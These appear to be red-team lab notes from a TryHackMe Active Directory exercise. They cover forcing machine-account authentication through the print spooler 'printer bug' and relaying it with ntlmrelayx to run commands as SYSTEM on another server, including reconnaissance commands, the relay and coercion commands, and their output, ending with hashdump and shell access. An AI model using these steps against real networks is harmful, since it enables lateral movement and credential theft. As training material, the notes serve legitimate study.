RedTeam
5.Machine
3.Active-Directory
General
Exploitation
5.Exploiting-AD
3.exploiting Automated Relays

General

Automated relays with machine accounts refer to a method where a machine or program is able to automatically access and control other machines or programs on the same Active Directory (AD) network using a machine account. This can be a vulnerability because it allows the machine or program to potentially access sensitive information or perform unauthorized actions on other machines or programs without the knowledge or consent of their users. Additionally, if the machine account is compromised, an attacker could use it to gain access to other machines or programs on the AD network. To mitigate this vulnerability, proper access controls and monitoring should be in place to limit the actions that machine accounts can perform, and to detect and respond to any suspicious activity.

The Printer Bug

The printer bug is a "feature" of the MS-RPRN protocol (PrintSystem Remote Protocol), which allows a domain user to remotely force a target host running the Print Spooler service to authenticate to an arbitrary IP address.

This vulnerability is related to automated relays because it allows a machine or program to remotely access and control another machine or program on the same AD network using a machine account and valid AD credentials.

  • Conditions Therefore, to exploit this, apart from machine account administrative privileges, we also need to meet the following four conditions :

    1. A valid set of AD account credentials.

    2. Network connectivity to the target's SMB service.

    3. The target host must be running the Print Spooler service.

    4. The hosts must not have SMB signing enforced.

    Condition 1 and 2 have been met already. The only two we need to ensure works are conditions 3 and 4.

Commands

Bloodhound

Bloodhound Custome Query (find instances where a computer has the "AdminTo" relationship over another computer)

MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p

Printer Bug

Powershell (Query service (Win32_Printer) running on other machine in AD via WMI)

PS C:\> GWMI Win32_Printer -Computer MACHINE_DOMAIN

	Location      :
	Name          : Microsoft XPS Document Writer
	PrinterState  : 0
	PrinterStatus : 3
	ShareName     :
	SystemName    : THMSERVER2
	
	Location      :
	Name          : Microsoft Print to PDF
	PrinterState  : 0
	PrinterStatus : 3
	ShareName     :
	SystemName    : THMSERVER2

The output from the cmdlet verifies that the service is running. If we get an access denied error, you could perhaps attempt the PowerShell command of Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc

SMB Signing

In order to relay the coerced authentication attempt, SMB signing should not be enforced. It should be noted that there is a difference between SMB signing being allowed and SMB signing being enforced.

To verify that THMSERVER1 and THMSERVER2 do not have SMB signing enforced, we can use Nmap

nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc

	Nmap scan report for distributor.za.tryhackme.loc (172.31.1.201)
	Host is up (0.62s latency).
	
	PORT    STATE SERVICE
	445/tcp open  microsoft-ds
	
	Host script results:
	| smb2-security-mode: 
	|   2.02: 
	|_    Message signing enabled but not required
	
	Nmap scan report for 172.31.1.202
	Host is up (0.38s latency).
	
	PORT    STATE SERVICE
	445/tcp open  microsoft-ds
	
	Host script results:
	| smb2-security-mode: 
	|   2.02: 
	|_    Message signing enabled but not required
	
	Nmap done: 2 IP addresses (2 hosts up) scanned in 4.59 seconds

We can see that SMB signing is enabled but not enforced based on the output. This means all our conditions are met, and we can start the attack!

Exploiting Authentication Relays

We will be using SpoolSample (opens in a new tab) to exploit the authentication relay.  We will use Spoolsample.exe to coerce THMSERVER2 to authenticate to us on our machine and then Impacket (opens in a new tab)'s ntlmrelayx.py (opens in a new tab) to relay the authentication attempt THMSERVER1.

Setup NTLM relay (Attacking Machine)

python3.9 ntlmrelayx.py -smb2support -t smb://"THMSERVER1 IP" -debug

If we specify the hostname of THMSERVER1 instead of the IP, the host could request that we use Kerberos authentication instead of NTLM

SSH session over the THMSERVER1 (Already own)

C:\>SpoolSample.exe THMSERVER2.za.tryhackme.loc "Local Attacker IP"

Output from the NTLM relay

thm$ python3.9 ntlmrelayx.py -smb2support -t smb://"THMSERVER1 IP" -c 'whoami /all' -debug
[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Received connection from 172.31.1.202, attacking target smb://172.31.1.201
[*] Authenticating against smb://172.31.1.201 as ZA/THMSERVER2$ SUCCEED
[+] No more targets
[*] SMBD-Thread-7: Connection from 172.31.1.202 controlled, but there are no more targets left!
[+] No more targets
[*] SMBD-Thread-8: Connection from 172.31.1.202 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] ExecuteRemote command: %COMSPEC% /Q /c echo whoami /all ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
[*] Executed specified command on host: 172.31.1.201

USER INFORMATION

User Name           SID     
=================== ========
nt authority\system S-1-5-18


GROUP INFORMATION

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner    
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                   
[...]

This output resembles what would happen if you used the -c 'whoami /all' command. However by specifying no command, you should now have performed a hashdump. These credentials can now be used to get a shell on the host!